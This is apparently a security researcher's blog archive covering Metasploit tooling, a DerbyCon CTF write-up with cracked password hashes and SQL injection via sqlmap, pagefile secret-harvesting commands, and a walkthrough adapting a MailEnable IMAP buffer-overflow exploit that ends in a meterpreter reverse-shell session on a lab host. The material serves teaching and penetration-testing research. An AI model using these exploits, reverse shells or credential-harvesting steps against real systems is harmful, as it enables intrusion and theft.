Communicating with your Metasploit server via Mono/.NET

A few months ago, I released a library that helped integrate Nexpose into your .NET/Mono applications. A few nights ago, I checked in my library that allows communication and integration with Metasploit from your .NET/Mono applications. Very much in beta, and I am not calling it feature complete. Works for the most part, but bugs will be found (and patches accepted!). Take a look at the Example I have to see it in action. It follows the same Session/Manager pattern as the nexpose library does. No pro methods added yet, just core.

New metasploit modules in trunk

Last night HDM checked in a telnetd remote root scanner and exploit module fore BSD-derived telnetd servers (this vuln affects telnet clients as well). We were up late last night working on it. Any testing is appreciated.

Today, sinn3r checked my CorpWatch API modules into trunk. These aid in OSINT research for a company during an engagement.

Metasploit and the Penetration Testing Execution Standard

I was recently asked to map out the Metasploit Framework's functionality with the PTES.

Have a look at the whitepaper, if you are interested in Metasploit or network security, it should be a great read.

www.tinyurl.com/msf-ptes

CorpWatch API integration with Metasploit: Information Gathering

I have submitted two modules today to the Metasploit redmine that allow integration of the CorpWatch API. They are very neat modules, allowing you to bring in information from SEC EDGAR straight into Metasploit without leaving the console. You can find and research parent and child companies, view past addresses, past names, SEC filings, all sorts of valuable information with gathering information on a company during an engagement.

Here is an example run: http://pastebin.com/d9MKjiQ2

Hopefully these modules will hit trunk soon, but if you want to play with them now, the diff is taken from the framework root.

Analyzing the Windows pagefile.sys from GNU/Linux

Problem: Given a pagefile.sys, how much information can you gain about the victim?

Hints: The pagefile.sys is stored as a bunch of 4k blocks. It is "virtual memory".


strings pagefile.sys | grep -i "^[a-z]:\\\\" | sort | uniq | less #List all paths in pagefile


NOTE: You could find a lot of paths referencing "d:\nt\base\random\path\to\src.c". These seem to be related to the drivers being loaded into memory and being pushed to the pagefile.

---------------


strings pagefile.sys | grep -i "^[a-zA-Z09_]*=.*" | sort -u | uniq | less #print env vars


You will invariably get a lot of false positives with this one. But a lot of good information as well.

----------------


strings pagefile.sys | egrep '([[:alnum:]_.-]{1,64}+@[[:alnum:]_.-]{2,255}+?\.[[:alpha:].]{2,4})' #print all email addresses.


There is a lot of good information that can be found that regular expressions simply can't pick up (or I just didn't think of).


-----------


One thing you can do to help protect youself is looking at this kb on how to wipe your pagefile on shutdown. A simple registry tweak is all it takes.

If you have shell on the victim, using meterpreter you can find out the values of this key using this:


reg enumkey -k
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session\ Manager\\Memory Management


FTA:

Change the data value of the ClearPageFileAtShutdown value in the following registry key to a value of 1:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
If the value does not exist, add the following value:
Value Name: ClearPageFileAtShutdown
Value Type: REG_DWORD
Value: 1

DerbyCon CTF Results and Notes

This weekend I attended DerbyCon, a hacker convention being held for its first time in Louisville, Kentucky. It had great talks by industry heavyweights in security, and a really awesome and fun CTF game. Initially, I wasn't even planning on playing the CTF. I had never done anything like the CTF before, and expected to be trounced. As it turns out though, a friend of mine, TheLightCosine, and I were bored and decided to check it out. TheLightCosine was actually taking Win32 exploit development training from corelanc0der and wasn't able to compete very much. Even when not in training, his brain was fried. The training was a bootcamp. With some help from TheLightCosine, however, I was able to place 5th on the CTF. Next year, I plan to be more organized and take the game a bit more seriously. All the notes I list here were just kept in my head, so I may miss a few things. This is also an abridged version.

The rules were simple. A small network was setup (derbycon_ctf) with no internet connection. There were two public targets that you were allowed to hack on (10.1.1.15,10.1.1.16), and one public target that was off limits (10.1.1.10). The latter was where the scoreboard resided and where you submitted your flags for your points.

The first thing I did when joining was nmapping the two targets that we were allowed to hack.

nmap -sS -O -PN -PU 10.1.1.15,16


This gave me an initial idea of what services the boxen were running. 10.1.1.15 had ports 80, 13370, and 3389. 10.1.1.16 was running 21,80,443, and 3389. Both were windows 2003 boxes. Occasionally, ports 23, 25, and 1337 would open on 10.1.1.16. This really confused me, but I assumed right off the bat that they were actually netcat listeners. I was never able to connect to one as someone always found them before I did. During the closing ceremonies, when the CTF prizes were given out, my assumption was confirmed by the CTF admins. They were netcat listeners.

One of the most important stages when hacking into machines like this is simple information gathering. We have HTTP/S ports, we have FTP, and we have MS Terminal Services. It turns out that port 13370 on 10.1.1.15 is also HTTP. The SSL Certificate for the HTTPS port on 10.1.1.16 was invalid, something to note for later use.

First things first, I hit up the ftp port. 'Lo and behold, a flag was waiting for me in the banner (Flag=AnonymousFTP). Logging in I found about 10 or so files on the ftp and two folders. One folder was locked down, I couldn't get in. The other, however, contained a text file with usernames and hashes. Other files on the root of the ftp were firefox databases for saved credentials, an .NET exe that you were required to reverse engineer (I almost figured this one out), a pcap file, and a file with a .docx extension (though it is just a plain text file). I downloaded these files to a local folder for later processing. My first action was to crack those hashes I found on the ftp server. I used john for this.


root@gits-and-shiggles:/home/upgraydd/Pictures/hidden# john --show secretdata
Administrator:NO PASSWORD:500:28361B9A6A28663E73EB37AA1787B284:::
derbycon:KENTUCKY:1012:8CFC8328E285BAE5702FB32AE7C95F87:::
ftpuser:FTP1:1013:2AED8B7C119F79B4F81D3FF9EB1760F3:::
jamesbond:007:1015:0B0412D8761239A73143EFAE928E9F0A:::
root:TOOR:1014:AFC44EE7351D61D00698796DA06B1EBF:::
sqldb:NO PASSWORD:1007:9CB9DCE36C9566A195A42282ADC6A404:::
texasranger:CHUCKNORRIS:1016:167A7A68DEA1D4FBD7B3F4F444690F24:::

9 password hashes cracked, 0 left
root@gits-and-shiggles:/home/upgraydd/Pictures/hidden#


This gave me credentials to work with now. None of these creds allowed me to get into the locked folder on ftp like I expected. I set these aside for later use. Once I had these, I decided to take a look at the terminal services ports. I used tsclient to connect to both 10.1.1.15 and 10.1.1.16. This gave a me a flag, but none of my credentials worked to log in. The flag, interestingly enough, was WasteOfTime. I decided to start perusing the http ports next.

10.1.1.16:80 gave two flags actually. One in the title of the index page, and one as an HTML comment. Super easy stuff. 10.1.1.16:80 also gives you a url to 10.1.1.15:13370/upload/upload.aspx. I wasn't able to break this script and get the flag I wanted.

Before I forget, one of the files on the FTP root was a file called qr.jpg. opening this up and reading the qr code with my phone yielded a flag. Dumping the exif data showed and interesting sup3rs3cr3tk3y string, apparently this was a flag, but it was not as apparent as the rest. When I found this out, I /headdesk'ed.

If you go to the HTTP root of 10.1.1.15:13370, you find a replica of the derbycon.com website. It is slightly altered however, a few flags are thrown around inside and in cookies. There is also a new News page, which I figured out a sql injection for to receive another flag. Thankfully, TheLightCosine showed me how to save the post request with the sql injection via burpsuite and pass the request to sqlmap. This was a gold mine, giving me many more flags. I missed one however, and I have no idea where it would have been. It also turns out the version of sqlmap in the Ubuntu repos is very old. I needed to download the latest release from sourceforge in order to use this functionality (the -r flag in sqlmap). Also on this news page was an HTML comment with some credentials. I found this very early on and tried it on the FTP with no success. This bothered me because the credentials were ftpuser:ThisWillGetYouIn. It turns out the admins mistyped the username. It was supposed to be ftpadmin:ThisWillGetYouIn. Once they realised what happened, they updated the scoreboard with some vague information about an FTP credential on the site being fixed. I saw this, went back and grabbed the new creds. This worked on the FTP and got me into the folder I was not allowed in earlier. Inside the folder was a textfile with another flag.

I also remembered at this point I had yet to look at the robots.txt file on any of the web servers. This also led to two flags being found. One in the robots.txt file itself, and one that was referenced by the robots.txt.

While I let sqlmap dump what it found, I decided to go ahead and look at the files I got off ftp one more time. Three files jumped out at me. signons.sqlite, cert8.db and keey3.db. These files are how Firefox stores its stored credentials. I don't use firefox, and actually uninstalled it quite a long time ago off my netbook. I installed it, dropped the files into my user profile, went to Properties > Security > Show passwords in firefox and got another flag.

One thing I found in the /download folder of 10.1.1.15:13370 was a testkey.pem.txt. This was a private key. The pcap file on the ftp had SSL traffic in it, so TheLightCosine showed me how to decrypt the SSL traffic in the pcap file through wireshark. Once decrypted we found another flag. However, I felt like there was more to this pcap file than met the eye. I ran the pcap file through strings and ended up finding yet another flag.

At this point, I felt like I had exhausted the web servers for clues. I decided to run nikto on each port offering HTTP on both 10.1.1.15 and 10.1.1.16. This yielded a flag in the SSL cert and a vulnerable version of FCKeditor which I was unable to pop. During the closing ceremonies, the admins also showed us a file that nobody had gotten. A web.config.txt was sitting on the root of one of the web servers.

At this point, I turned my attention to the .NET exe. I was able to use mono to run it.


root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
No flag for you.
root@gits-and-shiggles:/home/upgraydd/Pictures#


I decided to see what happened when I passed it an argument.


root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe fdjskla
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
Try Harder N00b.
root@gits-and-shiggles:/home/upgraydd/Pictures#


Interesting, so it recognizes an argument was passed and changes its output. At this point I decided to disassemble the executable using monodis.



WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
.assembly extern mscorlib
{
.ver 4:0:0:0
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
}
.assembly extern System.Core
{
.ver 4:0:0:0
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
}
.assembly 'fu'
{
.custom instance void [mscorlib]System.Runtime.Versioning.TargetFrameworkAttribute::.ctor(string) = (
01 00 29 2E 4E 45 54 46 72 61 6D 65 77 6F 72 6B // ..).NETFramework
2C 56 65 72 73 69 6F 6E 3D 76 34 2E 30 2C 50 72 // ,Version=v4.0,Pr
6F 66 69 6C 65 3D 43 6C 69 65 6E 74 01 00 54 0E // ofile=Client..T.
14 46 72 61 6D 65 77 6F 72 6B 44 69 73 70 6C 61 // .FrameworkDispla
79 4E 61 6D 65 1F 2E 4E 45 54 20 46 72 61 6D 65 // yName..NET Frame
77 6F 72 6B 20 34 20 43 6C 69 65 6E 74 20 50 72 // work 4 Client Pr
6F 66 69 6C 65 ) // ofile

.custom instance void class [mscorlib]System.Reflection.AssemblyTitleAttribute::'.ctor'(string) = (01 00 07 64 72 6F 70 70 65 72 00 00 ) // ...dropper..

.custom instance void class [mscorlib]System.Reflection.AssemblyDescriptionAttribute::'.ctor'(string) = (01 00 00 00 00 ) // .....

.custom instance void class [mscorlib]System.Reflection.AssemblyConfigurationAttribute::'.ctor'(string) = (01 00 00 00 00 ) // .....

.custom instance void class [mscorlib]System.Reflection.AssemblyCompanyAttribute::'.ctor'(string) = (01 00 09 4D 69 63 72 6F 73 6F 66 74 00 00 ) // ...Microsoft..

.custom instance void class [mscorlib]System.Reflection.AssemblyProductAttribute::'.ctor'(string) = (01 00 07 64 72 6F 70 70 65 72 00 00 ) // ...dropper..

.custom instance void class [mscorlib]System.Reflection.AssemblyCopyrightAttribute::'.ctor'(string) = (
01 00 1B 43 6F 70 79 72 69 67 68 74 20 C2 A9 20 // ...Copyright ..
4D 69 63 72 6F 73 6F 66 74 20 32 30 31 31 00 00 ) // Microsoft 2011..

.custom instance void class [mscorlib]System.Reflection.AssemblyTrademarkAttribute::'.ctor'(string) = (01 00 00 00 00 ) // .....

.custom instance void class [mscorlib]System.Runtime.InteropServices.ComVisibleAttribute::'.ctor'(bool) = (01 00 00 00 00 ) // .....

.custom instance void class [mscorlib]System.Runtime.InteropServices.GuidAttribute::'.ctor'(string) = (
01 00 24 65 34 65 37 63 61 36 63 2D 63 32 61 62 // ..$e4e7ca6c-c2ab
2D 34 32 34 32 2D 61 33 65 35 2D 34 63 39 33 33 // -4242-a3e5-4c933
63 37 30 65 66 62 30 00 00 ) // c70efb0..

.custom instance void class [mscorlib]System.Reflection.AssemblyFileVersionAttribute::'.ctor'(string) = (01 00 07 31 2E 30 2E 30 2E 30 00 00 ) // ...1.0.0.0..

.custom instance void class [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::'.ctor'(int32) = (01 00 08 00 00 00 00 00 ) // ........

.custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = (
01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78 // ....T..WrapNonEx
63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 ) // ceptionThrows.

.hash algorithm 0x00008004
.ver 1:0:0:0
}
.module fu.exe // GUID = {B3456451-E34C-4B2C-A452-4A83679B44EF}


.namespace fu
{
.class private auto ansi beforefieldinit Program
extends [mscorlib]System.Object
{

// method line 1
.method private static hidebysig
default void Main (string[] args) cil managed
{
// Method begins at RVA 0x2050
.entrypoint
// Code size 98 (0x62)
.maxstack 2
.locals init (
string V_0,
string V_1,
string V_2,
bool V_3)
IL_0000: ldc.i4.1
IL_0001: br.s IL_0006

IL_0003: ldc.i4.0
IL_0004: br.s IL_0006

IL_0006: brfalse.s IL_0008

IL_0008: nop
IL_0009: ldstr "290e1babf4daa83eb606f0b4e02c73be"
IL_000e: stloc.0
IL_000f: ldstr "/cqhcfUx1LO/mUsiT5fV2WijYMEDdvsi/gh214qRVPfauxChLplgBDMHScj8v/PDYt1F03x1r4FAdNe2uP9iHeAsPqcwEWzw3WTk7UN0jQ0="
IL_0014: stloc.1
IL_0015: ldarg.0
IL_0016: ldlen
IL_0017: conv.i4
IL_0018: ldc.i4.1
IL_0019: ceq
IL_001b: stloc.3
IL_001c: ldloc.3
IL_001d: brtrue.s IL_002d

IL_001f: nop
IL_0020: ldstr "No flag for you."
IL_0025: call void class [mscorlib]System.Console::WriteLine(string)
IL_002a: nop
IL_002b: br.s IL_0061

IL_002d: ldarg.0
IL_002e: ldc.i4.0
IL_002f: ldelem.ref
IL_0030: call string class fu.Program::GetMd5Hash(string)
IL_0035: stloc.2
IL_0036: ldloc.2
IL_0037: ldloc.0
IL_0038: call bool string::Equals(string, string)
IL_003d: stloc.3
IL_003e: ldloc.3
IL_003f: brtrue.s IL_004f

IL_0041: nop
IL_0042: ldstr "Try Harder N00b."
IL_0047: call void class [mscorlib]System.Console::WriteLine(string)
IL_004c: nop
IL_004d: br.s IL_0061

IL_004f: ldloc.1
IL_0050: call void class [mscorlib]System.Console::WriteLine(string)
IL_0055: nop
IL_0056: ldstr "Fix me :P"
IL_005b: call void class [mscorlib]System.Console::WriteLine(string)
IL_0060: nop
IL_0061: ret
} // end of method Program::Main

// method line 2
.method private static hidebysig
default string GetMd5Hash (string input) cil managed
{
// Method begins at RVA 0x20c0
// Code size 90 (0x5a)
.maxstack 3
.locals init (
class [mscorlib]System.Security.Cryptography.MD5 V_0,
unsigned int8[] V_1,
class [mscorlib]System.Text.StringBuilder V_2,
int32 V_3,
string V_4,
bool V_5)
IL_0000: nop
IL_0001: call class [mscorlib]System.Security.Cryptography.MD5 class [mscorlib]System.Security.Cryptography.MD5::Create()
IL_0006: stloc.0
IL_0007: ldloc.0
IL_0008: call class [mscorlib]System.Text.Encoding class [mscorlib]System.Text.Encoding::get_UTF8()
IL_000d: ldarg.0
IL_000e: callvirt instance unsigned int8[] class [mscorlib]System.Text.Encoding::GetBytes(string)
IL_0013: callvirt instance unsigned int8[] class [mscorlib]System.Security.Cryptography.HashAlgorithm::ComputeHash(unsigned int8[])
IL_0018: stloc.1
IL_0019: newobj instance void class [mscorlib]System.Text.StringBuilder::'.ctor'()
IL_001e: stloc.2
IL_001f: ldc.i4.0
IL_0020: stloc.3
IL_0021: br.s IL_0041

IL_0023: nop
IL_0024: ldloc.2
IL_0025: ldloc.1
IL_0026: ldloc.3
IL_0027: ldelema [mscorlib]System.Byte
IL_002c: ldstr "x2"
IL_0031: call instance string unsigned int8::ToString(string)
IL_0036: callvirt instance class [mscorlib]System.Text.StringBuilder class [mscorlib]System.Text.StringBuilder::Append(string)
IL_003b: pop
IL_003c: nop
IL_003d: ldloc.3
IL_003e: ldc.i4.1
IL_003f: add
IL_0040: stloc.3
IL_0041: ldloc.3
IL_0042: ldloc.1
IL_0043: ldlen
IL_0044: conv.i4
IL_0045: clt
IL_0047: stloc.s 5
IL_0049: ldloc.s 5
IL_004b: brtrue.s IL_0023

IL_004d: ldloc.2
IL_004e: callvirt instance string object::ToString()
IL_0053: stloc.s 4
IL_0055: br.s IL_0057

IL_0057: ldloc.s 4
IL_0059: ret
} // end of method Program::GetMd5Hash

// method line 3
.method private static hidebysig
default string EncryptString (string plainText, string Key) cil managed
{
// Method begins at RVA 0x2128
} // end of method Program::EncryptString

// method line 4
.method private static hidebysig
default string DecryptString (string cipherText, string Key) cil managed
{
// Method begins at RVA 0x228c
} // end of method Program::DecryptString

// method line 5
.method public hidebysig specialname rtspecialname
instance default void '.ctor' () cil managed
{
// Method begins at RVA 0x24c4
// Code size 7 (0x7)
.maxstack 8
IL_0000: ldarg.0
IL_0001: call instance void object::'.ctor'()
IL_0006: ret
} // end of method Program::.ctor

} // end of class fu.Program
}


I immediately notice that it stores an MD5 hash in a string, and another string that appears to in base64. Following the logic, I realised that it took the argument, md5'd it and compared the result to the stored md5 sum. If it matched, it would print the base64 string and tell you to fix it. Technically, you don't even need to know what the argument it is expecting is, but I wanted to be thorough. The md5sum is an md5sum of the string 'kc57' (one of the CTF admins @_kc57).



root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe kc57
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
/cqhcfUx1LO/mUsiT5fV2WijYMEDdvsi/gh214qRVPfauxChLplgBDMHScj8v/PDYt1F03x1r4FAdNe2uP9iHeAsPqcwEWzw3WTk7UN0jQ0=
Fix me :P
root@gits-and-shiggles:/home/upgraydd/Pictures#


This string stumped me. I spent too much time on it and probably went every way I shouldn't have in order to figure it out. I never did.


I look forward to competing next year. TheLightCosine and I will probably team up for real and pwn some pants of.

Breaking MailEnable 2.34: A lesson in security featuring Metasploit, Immunity Debugger, and mona.py

Not that this is any major feat, but I thought it would do as a nice primer to investigating bugs Immunity Debugger and mona.py and exploiting them with Metasploit.


I was researching a vulnerability today, Metasploit has a module called mailenable_login with a target of MailEnable 2.35. Doing some research into the exploit, it is a buffer overflow, and not just 2.35 is vulnerable to this bug. From the CVE:


Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and Enterprise Edition 1.1 through 1.41 allows remote attackers to execute arbitrary code via a pre-authentication command followed by a crafted parameter and a long string, as addressed by the ME-10025 hotfix.


This is a good thing, because after searching for about an hour, I hadn't found an installer for the 2.35 version. The official historical archive for the MailEnable releases has that release conspicuously missing. However, other reportedly vulnerable releases, such as 2.34 was available. I happily obliged and grabbed 2.34, in hopes I would be able to get it to work without too much effort.

Well, short story short, the target in the module didn't "just work" as I had hoped. But it did crash the server, which was interesting. I decided to look further. I am not very seasoned at this type of debugging, so the guys in #corelan on irc.freenode.net were my first stop for getting pushed in the right direction.

Up until now, I had been using WinDbg, a debugger offered by Microsft with their Driver development kit. corelanc0der offered some better advice, grab a copy of Immunity Debugger and mona.py. After installing Immunity Debugger, I dropped mona.py in the PyCommands folder in the Immunity Debugger folder in Program Files. This enables me to utilize the "swiss army knife" the corelan team developped to speed up exploit development. I don't fully understand it, but already can see it is quite powerful. The first thing I had to do was crash the service, in this case MEIMAPS.exe. I attached Immunity Debugger to the currently running MEIMAPS.exe (it is run as a service automagically at startup). I know how to crash it, just run the 2.35 target against, and bam.



Notice how EIP is the same address as the return address in the original 2.35 target...



So, that obviously doesn't work, we don't like access violations. Maybe mona.py can show us some better places to exploit this application. But in order to do this, I need to make a few changes to the original metasploit module. Open it up in your favorite text editor, I did it in vim, and change your sploit. Comment out the original and add your own.



Check out this rather old article with details on pattern_create(). This gives mona.py some data to work with that is comprehensible, easy to traverse, and gather information about. A really cool feature of mona.py is that it will generate a template for your exploit with offsets and return pointers used to execute arbitrary commands. All you do is fill in the blanks. Let's see what mona.py has to offer:



If mona.py finds somethings it thinks is useful, you will get a small popup with predefined templates in a drop down box. I chose the remote client (tcp) template. Another series of popup dialogs will popup, one meaningful, and another not so meangingful. The former is the remote port to listen on. The latter is the Exploit-db id. Ironically, due to a bug in Immunity debugger, your answer the in remote port box will carry over into the next box, the exploit db id box. You do not want this. Be sure to clear it out if you don't want to include the exploit-db id.




Anyways, enough with silly dialogs. When everything is said and done, inside C:\Program Files\Immunity Inc\Immunity Debugger\ will lie an exploit.rb file. This is your exploit module shell for Metasploit. Be sure to check it over, it may not be optimal, even if it does *work*.




Hmm, looks like it'll work. But what the fudge is CLBCATQ.DLL? We want something a little more standard than this. Luckily, mona.py has some tools specifically for this.
We know we want a jmp/push esp. push was denoted in the generated module. It works, but let's try a jmp first, it is what the first target uses, so it would be a little bit more straightforward and consistent.



Cool! We found 2 pointers in a pretty freaking stable place, MSVCP60.DLL. Let's take a closer look.



Cool, so we have one jmp and one push. Remember our original exploit.rb that mona.py generated for us? The return address that it defines in CLBCATQ.DLL (0x76ffcb51) can be replaced with either of these addresses (0x76095d68 is the push and 0x760a9d6e is the jmp) in MSVCP60.DLL. The two addresses are printed out to the screen right above the red text. The two lines each begin with an address and either of these will do. We need to dig into the metasploit framework now. We need to add the target, which should really work for more than just this 2.34 release. The CVE lists a few in the 2.3x range. I think it should hit all of them, but am willing to eat my words.



Your targets in the mailenable_login.rb module should look similar to this, depending on the return address you chose from MSVCP60.DLL. Let's test it. You need to uncomment out the sploit lines from before and remove your line you inserted with pattern_create(1000).

root@bperry-laptop:/home/bperry# msfconsole -L

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 710 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r13108 updated today (2011.07.06)

msf > use exploit/windows/imap/mailenable_login 
msf exploit(mailenable_login) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(mailenable_login) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   MailEnable 2.35 Pro
   1   MailEnable 2.34 Pro


msf exploit(mailenable_login) > set TARGET 1
TARGET => 1
msf exploit(mailenable_login) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mailenable_login) > set LHOST 192.168.1.71
LHOST => 192.168.1.71
msf exploit(mailenable_login) > show options

Module options (exploit/windows/imap/mailenable_login):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.105    yes       The target address
   RPORT  143              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.71     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   MailEnable 2.34 Pro


msf exploit(mailenable_login) > exploit

[*] Started reverse handler on 192.168.1.71:4444 
[*] Trying target MailEnable 2.34 Pro...
[*] Sending stage (752128 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.71:4444 -> 192.168.1.105:1037) at 2011-07-06 21:27:55 -0500

meterpreter > Success!
[-] Unknown command: Success!.
meterpreter > exit
[*] Shutting down Meterpreter...

[*] Meterpreter session 1 closed.  Reason: User exit
msf exploit(mailenable_login) > exit
root@bperry-laptop:/home/bperry# 

Whee! I have submitted the patch to the metasploit guys here, it should be in trunk shortly. If you would like to play with this, you may download the relevant binaries from MailEnable themselves. Just not 2.35! Har har har...

OpenVAS 4 has landed in UNSTABLE in OBS

Add this to your sources.lst:

deb http://download.opensuse.org/repositories/security:/OpenVAS:/UNSTABLE:/v4/xUbuntu_10.10/ ./

Then you need to get the key and add it to apt:

wget http://download.opensuse.org/repositories/security:/OpenVAS:/UNSTABLE:/v4/xUbuntu_10.10/Release.key
apt-key add Release.key
rm Release.key

Then just

apt-get update

Analyzing the Windows NT registry without advapi32.dll using Mono (PoC)

I have been doing some challenges for a contest and one requires analyzing a set of Windows NT registry hives. Regedit really sucks (though it does run in wine). I decided it would be more fun to write a small library that can read the registry hives without relying on p/invoke and advapi32.dll on Windows. I have some small code that carves out the data I need, though I am running into a problem on the software hive supplied. Maybe someone can point me in the right direction.

A lot of my information came from this text file which I found, and have updated some with information that I found missing.

As far as I can tell, there are 6 data types to be carved out of the hives. regf file headers, hbin blocks, node keys, value keys, and lf/h (lh on XP) blocks. There are also security keys (with a sk header) within node keys. The following regex's should carve out the data from the registry files so you may parse out the information you need.

Regex regf = new Regex (@"^regf.{508}");
Regex nk = new Regex (@"nk[\x2c|\x20]\x00.{7}\x01.{64}");
Regex vk = new Regex (@"vk.{3}\x00\x00[\x00|\x80].{64}");
Regex hbin = new Regex (@"hbin.{4}\x00\x10\x00\x00.{8}");
Regex lf = new Regex (@".{4}l[f|h][0-65535].{8}"); //lf or lh on winxp

But in order to search the hive, we need to read it in. This isn't very efficient, and I am aware of this. It works.

using (FileStream fs = File.OpenRead (path)) {
 var data = new byte[checked((int)fs.Length)];
 int i = 0;
 int read;
     
 using (var ms = new MemoryStream (checked((int)fs.Length))) {
      
  while ((read = fs.Read (data, 0, data.Length)) > 0) {
   ms.Write (data, 0, read);
   i += read;
  }
      
  byte[] hive = ms.ToArray ();
  char[] cList = new char[fs.Length];
      
  i = 0;
  foreach (byte b in hive)
   cList[i++] = (char)b;
      
         string d = new string (cList);
 
      
  int all = 0;
      
  foreach (Match mx in lf.Matches (d)) { //you can change out the regex you want here.
   byte[] bb = new byte[mx.Value.Length];
   char[] cb = new char[mx.Value.Length];
       
   for (int k = 0; k < mx.Value.Length; k++) {
    bb[k] = (byte)mx.Value[k];
    cb[k] = (char)bb[k];
    
   }
   
   all++;
   
   //Console.WriteLine (new string (cb));
  }
  
  Console.WriteLine (all.ToString ());
  all = 0;
 }
}

Basically, we read in the hive into a MemoryStream, convert the stream into a byte array, move that into a char array from which we create a string to search for the regexs in. Yes, we store 4 copies of the registry in memory. I am sure there are better ways to do this.

Then we loop through each match and count them. Of course we are working with binary streams, so if you choose to write the data carved out to the console, it will look like random data (to the untrained eye at least).

Running through all the hives supplied, I get this output:

/home/bperry/SAM
nk[\x2c|\x20]\x00.{7}\x01.{64}
47
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
36
hbin.{4}\x00\x10\x00\x00.{8}
6
^regf.{508}
1

/home/bperry/software
nk[\x2c|\x20]\x00.{7}\x01.{64}
43147
.{4}l[f|h][0-65535].{8}
6
vk.{3}\x00\x00[\x00|\x80].{64}
54708
hbin.{4}\x00\x10\x00\x00.{8}
2917
^regf.{508}
0

/home/bperry/system
nk[\x2c|\x20]\x00.{7}\x01.{64}
11189
.{4}l[f|h][0-65535].{8}
4
vk.{3}\x00\x00[\x00|\x80].{64}
21926
hbin.{4}\x00\x10\x00\x00.{8}
1121
^regf.{508}
1

/home/bperry/default
nk[\x2c|\x20]\x00.{7}\x01.{64}
554
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
1014
hbin.{4}\x00\x10\x00\x00.{8}
58
^regf.{508}
1

/home/bperry/SECURITY
nk[\x2c|\x20]\x00.{7}\x01.{64}
220
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
147
hbin.{4}\x00\x10\x00\x00.{8}
10
^regf.{508}
1

The number printed after the regex is the number of matches found. The data is fully carved out, so the only thing left is to break it apart to get the relevant data. If you will notice however, software reports 0 regf file headers, and I cannot figure out why. Any thoughts?

New appliances for network auto-assessment script available

I have uploaded the beta od-autoassess 10.10 virtual appliances (VirtualBox) and have made them available through torrents (preferred) as well. I am getting close to capping my monthly bandwidth (450gb a month, dang!), so please use one of the torrents if possible. Please test them and report any issues by contacting me (or let me know how awesome it is!).

These appliances are fully configured to run all aspects of the autoassessment script. These are beta releases, though I don't think much will change between these betas and any official release. Credentials are rooty/ytoor and you can `sudo su` from there to get root and run a scan (a proper scan should be in the bash history on each appliance, getting root and running through the history should bring it up). But if you are lazy, here is a full scan command:

sh /opt/od-autoassess/od-autoassess.sh --client="FooBarWidgets" --range=192.168.1.0/24 --start-openvassd \
--openvas-user="rooty" --openvas-pass="ytoor" \
--metasploit-sql-driver="mysql" --metasploit-sql-conn="root:toor@127.0.0.1/metasploit" \
--enable-wapiti --enable-w3af

Also, if you like the appliances, the script, or any of my other projects, maybe a donation is in order! I am working part time at Joe's Crab Shack to pay my server and tuition costs while attending school, and any help will be much appreciated!

Maths, pt1 and other news

I recently found a really awesome project, MOSA (Managed Operating System Alliance). I haven't had more fun hacking and breaking code in a long time. It's just really neat being able to write your operating system in C#.

One of my projects is building an operating system that performs floating-point arithmetic and fast fourier transforms as kind of a benchmark for the operating system/Ahead-Of-Time compiler. A few years ago, I ported John Walker's FBENCH to C# and I thought this would be an excellent candidate for the task. He also has a benchmark, FFBENCH (Fast-Fourier Transforms) which I plan on porting in the next few days as well.

The MOSA project, however, is quite young compared to other projects like it. It isn't very complete at all and isn't really useful yet. I plan on helping out with this a bit. For instance, I took the trig functions John Walker uses in FBENCH (he defined all the trig functions in case you didn't want to use math.h) and moved them over to C#. It wasn't terribly difficult, just a bit tedious. If you would like a copy of these methods, you may get them here. If all goes well and according to plan, these methods will go into Korlib, the core library MOSA uses for the OS.

I will be making a post in the next few days regarding the ports of the two math benchmarks to C#, and maybe even an image of my OS that can run in QEMU! A new release had been made of the benchmarks since I ported last, so this morning was spent porting the new FBENCH to C# and it is working quite dandily (is that a word?). FFBENCH should be even easier. There are a few tests I want to run regarding these benchmarks. Speed of Mono vs .NET arithmetically and the speed of using System.Math vs my methods. Hopefully I have some good results to show soon.


